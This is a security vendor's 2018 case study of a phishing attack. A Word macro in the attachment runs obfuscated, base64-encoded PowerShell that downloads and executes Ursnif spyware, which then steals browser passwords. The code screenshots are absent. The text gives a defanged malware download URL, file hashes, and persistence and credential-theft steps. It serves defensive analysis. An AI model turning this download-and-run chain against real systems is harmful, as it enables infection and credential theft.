Case Study

Advanced Attack Analysis.

Uri Ahronovich, Cyber Security Engineer
June 29, 2018

Perception Point’s platform recently caught an advanced threat directed at one of our customers within a Microsoft Word file. Our Incident Analysis report below provides a detailed understanding of the attack and the damage it could have caused.

Key observations regarding this attack:

Overview.

One of our customers received an email that had been flagged “malicious” by Perception Point’s platform. This report includes a “what-if” analysis to examine the potential effect of the attack, in case the malicious file had not been blocked.

STAGE ONE

Header Analysis.

  1. In order to gain the recipient’s trust, the attacker sent the email from an account that seemed similar to an executive that they regularly conduct business with. The domain name was the same except for the extension; “domain.net” instead of “domain.com”. The “domain.net” was not found as a known mail server.

  2. Perception Point’s platform:

    1. Our platform detected the malicious content and flagged the email as “malicious”, due to an attachment that contained a .doc file.
      .doc file
    2. The MD5 of the file is: fdd7f9367f976ceb07279648f373a93b
    3. Perception Point’s team uploaded the file to VirusTotal since it was not updated as malicious.


STAGE TWO

Attachment Analysis.

Perception Point’s engines identified the malicious activity by tracking down Macro commands. We noticed the following anomalies: the macro is obfuscated and the code itself is too long for no legitimate reason.
The command lines as extracted by Perception Point’s platform
The command lines as extracted by Perception Point’s platform

STAGE THREE

Dynamic Analysis of the Attachment.

  1. Researching the Word .doc file in a contained environment shows that the macro runs an encrypted PowerShell command.


    null

  2. The PowerShell is base64 encoded.


    null

  3. Once the first layer decoded, the resulting payload is as follows:


    null

  4. For the purpose of this analysis, we removed the last command “invoke-expression”, to prevent any actual malicious activity and then ran the command:


    null

  5. The PowerShell script downloads an .exe file from hxxp://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn, renames it with a random name, saves it in a temp folder, and then executes it.


STAGE FOUR

Executable File Analysis.

  1. The executable file downloaded was identified as “Spyware” in Virustotal (File hash: 5eb5a460b9a8ce8c00b54e53e14eec78):


    null

  2. The file is classified as TrojanSpy:Win32/Ursnif. TrojanSpy:Win32/Ursnif is a generic malware family that contains capabilities such as keylogging*, data theft, C&C.
    *) A “Keylogger” (denotes for “keystroke logger”) is a computer software that tracks or logs the keys struck on your keyboard, typically in a covert manner so the user does not know that his/her actions are being monitored. This is usually done with malicious intent to collect the user’s account information, credit card numbers, usernames, passwords, and other private data.
  3. TrojanSpy:Win32/Ursnif has been around since November 20, 2010, but this specific sample was submitted to VT on June 12, 2018:


    null
  4. Persistence techniques:
    1. The executable file copies itself to the Administrator/AppData/Roaming/Microsoft/Dfdtents folder. This folder is hidden by default in Windows file system setting, hence it is an invisible folder to the user.


      null

    2. Creates a registry key for persistence.


      null


STAGE FIVE

Data Collection.

  1. The malware collects data, such as usernames and passwords from browsers, and saves it in a hidden folder.

    null
  2. In order to test the malware, we simulated a login activity to a Gmail account. As can be seen in the screenshot below, the malware had stolen the username and the matching password.

    null

Summary.

This attack could have been very damaging for our customer, as it was well-disguised and very effective once released. Learn more about how our hardware-assisted platform is able to catch such attacks here:

Our Technology

Share the joy
Stay a step ahead

Research & News.

Asset 5
Case Study

Case Study: Advanced Attack Analysis

Uri Ahronovich

Perception Point’s platform recently caught an advanced threat directed at one of our customers within a Microsoft Word file.

Asset 5
Article

Why Relays, AVs, & Sandboxes just aren’t enough anymore

By Jonathan Levy

Over the years organizations have implemented multi-layered approaches to protect their email, due to the fact that no single solution has provided sufficient results.

Asset 5
Research

Breaking CFI: Exploiting CVE-2015-5122 using COOP

By Oshri Sela & Shlomi Levin

In this series of posts we’re going to demonstrate how modern CFI implementations can be circumvented.

Show More
Contact Us

Schedule a trial today.

Yes, I would like to receive email communications from Perception Point. I understand I can unsubscribe at any time.